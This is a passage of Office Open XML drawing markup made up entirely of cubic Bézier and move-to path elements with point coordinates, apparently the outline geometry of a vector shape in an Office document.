                  <a:cubicBezTo>
                    <a:pt x="284" y="380"/>
                    <a:pt x="283" y="379"/>
                    <a:pt x="282" y="380"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="381"/>
                    <a:pt x="282" y="381"/>
                    <a:pt x="282" y="381"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="385"/>
                    <a:pt x="285" y="389"/>
                    <a:pt x="283" y="398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283" y="398"/>
                    <a:pt x="283" y="399"/>
                    <a:pt x="282" y="400"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="281" y="399"/>
                    <a:pt x="280" y="401"/>
                    <a:pt x="279" y="401"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279" y="401"/>
                    <a:pt x="279" y="401"/>
                    <a:pt x="279" y="401"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="280" y="402"/>
                    <a:pt x="280" y="402"/>
                    <a:pt x="280" y="402"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="281" y="402"/>
                    <a:pt x="281" y="402"/>
                    <a:pt x="281" y="402"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="403"/>
                    <a:pt x="285" y="405"/>
                    <a:pt x="288" y="403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="290" y="400"/>
                    <a:pt x="291" y="400"/>
                    <a:pt x="297" y="401"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="298" y="401"/>
                    <a:pt x="298" y="401"/>
                    <a:pt x="300" y="400"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302" y="398"/>
                    <a:pt x="305" y="397"/>
                    <a:pt x="306" y="396"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="307" y="396"/>
                    <a:pt x="307" y="396"/>
                    <a:pt x="308" y="397"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="311" y="397"/>
                    <a:pt x="314" y="391"/>
                    <a:pt x="318" y="394"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="319" y="395"/>
                    <a:pt x="319" y="395"/>
                    <a:pt x="321" y="395"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321" y="395"/>
                    <a:pt x="321" y="395"/>
                    <a:pt x="322" y="395"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="395"/>
                    <a:pt x="323" y="395"/>
                    <a:pt x="323" y="395"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="396"/>
                    <a:pt x="322" y="397"/>
                    <a:pt x="322" y="398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="398"/>
                    <a:pt x="323" y="398"/>
                    <a:pt x="323" y="398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="398"/>
                    <a:pt x="323" y="398"/>
                    <a:pt x="322" y="402"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="322" y="402"/>
                    <a:pt x="322" y="402"/>
                    <a:pt x="322" y="402"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="402"/>
                    <a:pt x="329" y="397"/>
                    <a:pt x="329" y="397"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="398"/>
                    <a:pt x="330" y="398"/>
                    <a:pt x="330" y="398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="398"/>
                    <a:pt x="330" y="398"/>
                    <a:pt x="330" y="398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="329" y="399"/>
                    <a:pt x="327" y="400"/>
                    <a:pt x="326" y="402"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="401"/>
                    <a:pt x="327" y="401"/>
                    <a:pt x="327" y="401"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="401"/>
                    <a:pt x="327" y="401"/>
                    <a:pt x="328" y="401"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="328" y="401"/>
                    <a:pt x="328" y="402"/>
                    <a:pt x="327" y="402"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="403"/>
                    <a:pt x="327" y="403"/>
                    <a:pt x="327" y="403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="403"/>
                    <a:pt x="326" y="403"/>
                    <a:pt x="326" y="403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="325" y="404"/>
                    <a:pt x="325" y="404"/>
                    <a:pt x="325" y="405"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="404"/>
                    <a:pt x="326" y="403"/>
                    <a:pt x="327" y="404"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="404"/>
                    <a:pt x="327" y="405"/>
                    <a:pt x="327" y="405"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="406"/>
                    <a:pt x="327" y="406"/>
                    <a:pt x="327" y="406"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="406"/>
                    <a:pt x="327" y="406"/>
                    <a:pt x="327" y="406"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="406"/>
                    <a:pt x="327" y="406"/>
                    <a:pt x="327" y="406"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="406"/>
                    <a:pt x="326" y="407"/>
                    <a:pt x="326" y="407"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="409"/>
                    <a:pt x="324" y="409"/>
                    <a:pt x="325" y="410"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="410"/>
                    <a:pt x="326" y="410"/>
                    <a:pt x="327" y="410"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="411"/>
                    <a:pt x="327" y="411"/>
                    <a:pt x="327" y="411"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="329" y="412"/>
                    <a:pt x="330" y="410"/>
                    <a:pt x="331" y="409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="409"/>
                    <a:pt x="332" y="409"/>
                    <a:pt x="332" y="409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="410"/>
                    <a:pt x="331" y="410"/>
                    <a:pt x="331" y="411"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="411"/>
                    <a:pt x="331" y="411"/>
                    <a:pt x="331" y="411"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340" y="408"/>
                    <a:pt x="340" y="408"/>
                    <a:pt x="346" y="404"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="404"/>
                    <a:pt x="346" y="404"/>
                    <a:pt x="346" y="403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="352" y="397"/>
                    <a:pt x="360" y="393"/>
                    <a:pt x="366" y="387"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="411" y="328"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="411" y="328"/>
                    <a:pt x="411" y="328"/>
                    <a:pt x="411" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="411" y="328"/>
                    <a:pt x="411" y="328"/>
                    <a:pt x="411" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="411" y="327"/>
                    <a:pt x="411" y="327"/>
                    <a:pt x="411" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="411" y="327"/>
                    <a:pt x="411" y="327"/>
                    <a:pt x="411" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="411" y="326"/>
                    <a:pt x="411" y="326"/>
                    <a:pt x="411" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="411" y="326"/>
                    <a:pt x="411" y="326"/>
                    <a:pt x="411" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="411" y="326"/>
                    <a:pt x="411" y="326"/>
                    <a:pt x="411" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="411" y="326"/>
                    <a:pt x="411" y="326"/>
                    <a:pt x="411" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="411" y="326"/>
                    <a:pt x="411" y="326"/>
                    <a:pt x="411" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="326"/>
                    <a:pt x="410" y="326"/>
                    <a:pt x="410" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="327"/>
                    <a:pt x="410" y="327"/>
                    <a:pt x="410" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="328"/>
                    <a:pt x="410" y="328"/>
                    <a:pt x="410" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="328"/>
                    <a:pt x="410" y="328"/>
                    <a:pt x="410" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="411" y="328"/>
                    <a:pt x="411" y="328"/>
                    <a:pt x="411" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="411" y="328"/>
                    <a:pt x="411" y="328"/>
                    <a:pt x="411" y="328"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="406" y="320"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="406" y="320"/>
                    <a:pt x="406" y="320"/>
                    <a:pt x="406" y="320"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="406" y="319"/>
                    <a:pt x="406" y="319"/>
                    <a:pt x="406" y="319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="406" y="319"/>
                    <a:pt x="406" y="319"/>
                    <a:pt x="406" y="319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="407" y="318"/>
                    <a:pt x="407" y="318"/>
                    <a:pt x="407" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="407" y="318"/>
                    <a:pt x="407" y="318"/>
                    <a:pt x="407" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="406" y="317"/>
                    <a:pt x="406" y="317"/>
                    <a:pt x="406" y="317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="406" y="316"/>
                    <a:pt x="406" y="316"/>
                    <a:pt x="406" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="406" y="315"/>
                    <a:pt x="406" y="315"/>
                    <a:pt x="406" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="406" y="315"/>
                    <a:pt x="406" y="315"/>
                    <a:pt x="406" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="406" y="315"/>
                    <a:pt x="406" y="315"/>
                    <a:pt x="406" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="405" y="315"/>
                    <a:pt x="405" y="315"/>
                    <a:pt x="405" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="405" y="316"/>
                    <a:pt x="405" y="316"/>
                    <a:pt x="405" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="405" y="317"/>
                    <a:pt x="405" y="317"/>
                    <a:pt x="405" y="317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="405" y="318"/>
                    <a:pt x="405" y="318"/>
                    <a:pt x="405" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="405" y="318"/>
                    <a:pt x="405" y="318"/>
                    <a:pt x="405" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="405" y="319"/>
                    <a:pt x="405" y="319"/>
                    <a:pt x="405" y="320"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="406" y="320"/>
                    <a:pt x="406" y="320"/>
                    <a:pt x="406" y="320"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="406" y="320"/>
                    <a:pt x="406" y="320"/>
                    <a:pt x="406" y="320"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="406" y="320"/>
                    <a:pt x="406" y="320"/>
                    <a:pt x="406" y="320"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="402" y="311"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="402" y="311"/>
                    <a:pt x="402" y="311"/>
                    <a:pt x="402" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="401" y="311"/>
                    <a:pt x="401" y="311"/>
                    <a:pt x="401" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="400" y="312"/>
                    <a:pt x="400" y="312"/>
                    <a:pt x="400" y="312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="400" y="312"/>
                    <a:pt x="400" y="313"/>
                    <a:pt x="400" y="313"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="314"/>
                    <a:pt x="399" y="314"/>
                    <a:pt x="399" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="314"/>
                    <a:pt x="399" y="314"/>
                    <a:pt x="399" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="314"/>
                    <a:pt x="399" y="314"/>
                    <a:pt x="396" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="396" y="315"/>
                    <a:pt x="396" y="315"/>
                    <a:pt x="396" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="395" y="315"/>
                    <a:pt x="395" y="315"/>
                    <a:pt x="395" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="395" y="315"/>
                    <a:pt x="394" y="315"/>
                    <a:pt x="394" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="393" y="315"/>
                    <a:pt x="393" y="315"/>
                    <a:pt x="393" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="393" y="315"/>
                    <a:pt x="393" y="315"/>
                    <a:pt x="393" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="393" y="316"/>
                    <a:pt x="393" y="317"/>
                    <a:pt x="392" y="317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="392" y="318"/>
                    <a:pt x="392" y="318"/>
                    <a:pt x="392" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="393" y="317"/>
                    <a:pt x="393" y="317"/>
                    <a:pt x="394" y="317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="394" y="317"/>
                    <a:pt x="395" y="318"/>
                    <a:pt x="395" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="397" y="317"/>
                    <a:pt x="397" y="317"/>
                    <a:pt x="397" y="317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="398" y="317"/>
                    <a:pt x="398" y="317"/>
                    <a:pt x="398" y="317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="398" y="316"/>
                    <a:pt x="398" y="316"/>
                    <a:pt x="398" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="316"/>
                    <a:pt x="399" y="316"/>
                    <a:pt x="399" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="316"/>
                    <a:pt x="399" y="316"/>
                    <a:pt x="399" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="400" y="316"/>
                    <a:pt x="400" y="316"/>
                    <a:pt x="400" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="400" y="316"/>
                    <a:pt x="400" y="315"/>
                    <a:pt x="400" y="315"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="401" y="314"/>
                    <a:pt x="401" y="313"/>
                    <a:pt x="401" y="313"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="402" y="312"/>
                    <a:pt x="402" y="312"/>
                    <a:pt x="402" y="312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="402" y="311"/>
                    <a:pt x="402" y="311"/>
                    <a:pt x="402" y="311"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="349" y="325"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="349" y="325"/>
                    <a:pt x="349" y="324"/>
                    <a:pt x="349" y="324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="348" y="323"/>
                    <a:pt x="348" y="323"/>
                    <a:pt x="348" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="347" y="324"/>
                    <a:pt x="346" y="324"/>
                    <a:pt x="346" y="324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="324"/>
                    <a:pt x="346" y="326"/>
                    <a:pt x="345" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="327"/>
                    <a:pt x="345" y="327"/>
                    <a:pt x="345" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="327"/>
                    <a:pt x="347" y="327"/>
                    <a:pt x="347" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="348" y="327"/>
                    <a:pt x="348" y="326"/>
                    <a:pt x="349" y="325"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="334" y="325"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="334" y="325"/>
                    <a:pt x="334" y="325"/>
                    <a:pt x="334" y="325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="325"/>
                    <a:pt x="333" y="325"/>
                    <a:pt x="333" y="325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="325"/>
                    <a:pt x="332" y="325"/>
                    <a:pt x="331" y="325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="325"/>
                    <a:pt x="330" y="325"/>
                    <a:pt x="330" y="325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="326"/>
                    <a:pt x="331" y="326"/>
                    <a:pt x="331" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="326"/>
                    <a:pt x="331" y="326"/>
                    <a:pt x="331" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="326"/>
                    <a:pt x="331" y="326"/>
                    <a:pt x="331" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="326"/>
                    <a:pt x="331" y="326"/>
                    <a:pt x="332" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="325"/>
                    <a:pt x="332" y="326"/>
                    <a:pt x="333" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="326"/>
                    <a:pt x="333" y="326"/>
                    <a:pt x="333" y="326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="334" y="325"/>
                    <a:pt x="334" y="325"/>
                    <a:pt x="334" y="325"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="358" y="317"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="358" y="317"/>
                    <a:pt x="358" y="317"/>
                    <a:pt x="358" y="317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="358" y="317"/>
                    <a:pt x="358" y="317"/>
                    <a:pt x="358" y="317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="357" y="317"/>
                    <a:pt x="357" y="317"/>
                    <a:pt x="357" y="317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="356" y="318"/>
                    <a:pt x="356" y="318"/>
                    <a:pt x="356" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="356" y="318"/>
                    <a:pt x="356" y="318"/>
                    <a:pt x="356" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="356" y="318"/>
                    <a:pt x="356" y="318"/>
                    <a:pt x="356" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="356" y="319"/>
                    <a:pt x="356" y="319"/>
                    <a:pt x="356" y="319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="355" y="320"/>
                    <a:pt x="355" y="320"/>
                    <a:pt x="355" y="320"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="355" y="320"/>
                    <a:pt x="355" y="320"/>
                    <a:pt x="355" y="320"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="355" y="321"/>
                    <a:pt x="355" y="321"/>
                    <a:pt x="355" y="321"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="355" y="321"/>
                    <a:pt x="355" y="321"/>
                    <a:pt x="355" y="321"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="355" y="321"/>
                    <a:pt x="355" y="321"/>
                    <a:pt x="355" y="321"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="356" y="321"/>
                    <a:pt x="356" y="321"/>
                    <a:pt x="356" y="321"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="356" y="321"/>
                    <a:pt x="356" y="321"/>
                    <a:pt x="356" y="321"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="356" y="321"/>
                    <a:pt x="356" y="321"/>
                    <a:pt x="357" y="321"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="357" y="320"/>
                    <a:pt x="357" y="320"/>
                    <a:pt x="357" y="320"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="357" y="320"/>
                    <a:pt x="357" y="319"/>
                    <a:pt x="358" y="319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="358" y="318"/>
                    <a:pt x="358" y="318"/>
                    <a:pt x="358" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="358" y="318"/>
                    <a:pt x="358" y="318"/>
                    <a:pt x="358" y="317"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="391" y="332"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="392" y="332"/>
                    <a:pt x="392" y="331"/>
                    <a:pt x="392" y="330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="392" y="329"/>
                    <a:pt x="392" y="329"/>
                    <a:pt x="391" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="391" y="329"/>
                    <a:pt x="391" y="328"/>
                    <a:pt x="391" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="327"/>
                    <a:pt x="388" y="327"/>
                    <a:pt x="388" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="325"/>
                    <a:pt x="389" y="324"/>
                    <a:pt x="389" y="322"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="322"/>
                    <a:pt x="388" y="322"/>
                    <a:pt x="387" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="387" y="321"/>
                    <a:pt x="388" y="320"/>
                    <a:pt x="388" y="319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="389" y="319"/>
                    <a:pt x="389" y="319"/>
                    <a:pt x="390" y="319"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="319"/>
                    <a:pt x="390" y="318"/>
                    <a:pt x="390" y="318"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="318"/>
                    <a:pt x="390" y="317"/>
                    <a:pt x="389" y="317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="389" y="317"/>
                    <a:pt x="389" y="317"/>
                    <a:pt x="388" y="317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="317"/>
                    <a:pt x="387" y="317"/>
                    <a:pt x="387" y="317"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="387" y="316"/>
                    <a:pt x="387" y="315"/>
                    <a:pt x="387" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="387" y="314"/>
                    <a:pt x="387" y="314"/>
                    <a:pt x="387" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="386" y="313"/>
                    <a:pt x="386" y="313"/>
                    <a:pt x="386" y="313"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="386" y="313"/>
                    <a:pt x="386" y="313"/>
                    <a:pt x="385" y="311"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="384" y="310"/>
                    <a:pt x="383" y="310"/>
                    <a:pt x="382" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="382" y="310"/>
                    <a:pt x="382" y="310"/>
                    <a:pt x="382" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="382" y="309"/>
                    <a:pt x="382" y="309"/>
                    <a:pt x="382" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="381" y="309"/>
                    <a:pt x="381" y="309"/>
                    <a:pt x="380" y="309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="380" y="308"/>
                    <a:pt x="379" y="307"/>
                    <a:pt x="378" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="378" y="307"/>
                    <a:pt x="377" y="307"/>
                    <a:pt x="376" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="307"/>
                    <a:pt x="376" y="307"/>
                    <a:pt x="376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3" y="307"/>
                    <a:pt x="372" y="305"/>
                    <a:pt x="370" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="370" y="304"/>
                    <a:pt x="370" y="304"/>
                    <a:pt x="368" y="305"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="368" y="306"/>
                    <a:pt x="367" y="305"/>
                    <a:pt x="366" y="306"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="307"/>
                    <a:pt x="365" y="307"/>
                    <a:pt x="365" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="364" y="310"/>
                    <a:pt x="363" y="310"/>
                    <a:pt x="360" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="359" y="309"/>
                    <a:pt x="360" y="308"/>
                    <a:pt x="359" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="358" y="307"/>
                    <a:pt x="358" y="308"/>
                    <a:pt x="357" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="355" y="308"/>
                    <a:pt x="354" y="308"/>
                    <a:pt x="353" y="308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353" y="309"/>
                    <a:pt x="353" y="309"/>
                    <a:pt x="353" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="310"/>
                    <a:pt x="354" y="310"/>
                    <a:pt x="353" y="313"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="312"/>
                    <a:pt x="354" y="312"/>
                    <a:pt x="354" y="312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="312"/>
                    <a:pt x="354" y="312"/>
                    <a:pt x="354" y="312"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="355" y="312"/>
                    <a:pt x="355" y="311"/>
                    <a:pt x="356" y="311"/>
                  </a:cubicBezTo>
